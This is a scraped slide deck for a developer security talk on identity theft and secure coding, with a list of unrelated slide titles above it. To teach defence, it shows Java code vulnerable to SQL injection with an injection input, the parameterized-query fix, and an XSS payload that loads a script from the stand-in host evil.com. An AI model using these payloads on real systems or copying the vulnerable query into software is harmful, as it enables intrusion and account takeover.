Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdfLearn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
 
HR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.comHR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.com
 
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
 
The Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdf
The Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdfThe Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdf
The Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdf
 
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsUnveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
 
Advancing Engineering with AI through the Next Generation of Strategic Projec...
Advancing Engineering with AI through the Next Generation of Strategic Projec...Advancing Engineering with AI through the Next Generation of Strategic Projec...
Advancing Engineering with AI through the Next Generation of Strategic Projec...
 
EY_Graph Database Powered Sustainability
EY_Graph Database Powered SustainabilityEY_Graph Database Powered Sustainability
EY_Graph Database Powered Sustainability
 
Building Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
Building Real-Time Data Pipelines: Stream & Batch Processing workshop SlideBuilding Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
Building Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
 
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
 
Salesforce Certified Field Service Consultant
Salesforce Certified Field Service ConsultantSalesforce Certified Field Service Consultant
Salesforce Certified Field Service Consultant
 

Identity theft blue4it nljug

  • 2. Identity theft Cybercrime Hard to get rid of the consequences
 We create the code We protect the data
  • 3. Are we part of the solution Or part of the problem?
  • 5. Cybercrime Real threat and it is growing Organised and professional it’s a business
 Risks are low We are not ready Lot of money involved
  • 6. How profitable is cybercrime?
  • 7. Identity theft Identity theft is the deliberate use of someone else's identity, usually as a method to gain a financial advantage or obtain credit and other benefits in the other person's name, and perhaps to the other person's disadvantage or loss. The person whose identity has been assumed may suffer adverse consequences if they are held responsible for the perpetrator's actions.
  • 8. Kevin Goes (30) His identity data was stolen
 and then ….
  • 10. Data is like crude oil by itself it is dead, but comes to live when applying the right kind of science
  • 11.
  • 12. What can we do as developers Protect yourself & be aware
  • 13. Protect youself Where do I leave my notebook ? Where do I store my passwords ? Do I use my password multiple times ? Is my software up to date ? 2 step verification ? What wifi hotspot do I use ?
  • 14.
  • 16. Our application What we think it is What it actually is
  • 17.
  • 18. How many dependencies? Are all needed? Are all up-to-date? Are all reliable? Dependencies
  • 19.
  • 21. Security as part of your development process business value VS security code reviews clean code = secure code
  • 22. OWASP - ASVS Open Web Application Security Project Application Security Verification Standard https://www.owasp.org/index.php/ Category:OWASP_Application_Securit y_Verification_Standard_Project
  • 23. Code review String url = "jdbc:postgresql://localhost:5432/test?user=brian&password=brian";
 Connection conn = DriverManager.getConnection(url);
 Statement stmt = conn.createStatement();
 
 String newPassword = request.getParameter("password");
 String sql = "UPDATE Users SET password = '" + newPassword + "' WHERE id=1";
 
 stmt.execute(sql);
  • 24. Code review String url = "jdbc:postgresql://localhost:5432/test?user=brian&password=brian";
 Connection conn = DriverManager.getConnection(url);
 Statement stmt = conn.createStatement();
 
 String newPassword = request.getParameter("password");
 String sql = "UPDATE Users SET password = '" + newPassword + "' WHERE id=1";
 
 stmt.execute(sql); what if my input = ' '; ' UPDATE Users SET password =' '; ' WHERE id=1;
  • 25. SQL Injection String url = "jdbc:postgresql://localhost:5432/test?user=brian&password=brian";
 Connection conn = DriverManager.getConnection(url);
 Statement stmt = conn.createStatement();
 
 String newPassword = request.getParameter("password");
 String sql = "UPDATE Users SET password = '" + newPassword + "' WHERE id=1";
 
 stmt.execute(sql); what if my input = ' '; UPDATE Users SET password = ' ' UPDATE Users SET password =' '; UPDATE Users SET password = '' WHERE id=1;
  • 26. Query Parameterization String url = "jdbc:postgresql://localhost:5432/test?user=brian&password=brian";
 Connection conn = DriverManager.getConnection(url);
 
 String newPassword = request.getParameter("password");
 String sql = "UPDATE Users SET password = ? WHERE id=1";
 
 PreparedStatement pstmt = conn.prepareStatement(sql);
 pstmt.setString(1, newPassword);
 pstmt.executeUpdate();
  • 28. Password protection Don’t store plain text Don’t limit the password length Don’t limit the character set Don’t use an ordinary hash function
  • 29. Password protection Use a password policy Use a cryptographically strong credential-specific salt Use a cryptographic hash algorithm (e.g. PBKDF2) Use a HMAC (keyed-hash message authentication code), HMAC-SHA256 Design to be compromised
  • 30. XSS (Cross Side Scripting) http://www.jfokus.se/saveComment?comment=Java+is+Awesome! <h3> Thank you for you comments! </h3> You wrote: <p/> Java is Awesome <p/>
  • 31. XSS (Cross Site Scripting) http://www.jfokus.se/saveComment?comment=<script src="evil.com/ x.js"></script> <h3> Thank you for you comments! </h3> You wrote: <p/> <script src="evil.com/x.js"></script> <p/>
  • 32. Summary BE AWARE Protect yourself Integrate security in development process https://www.owasp.org
 ASVS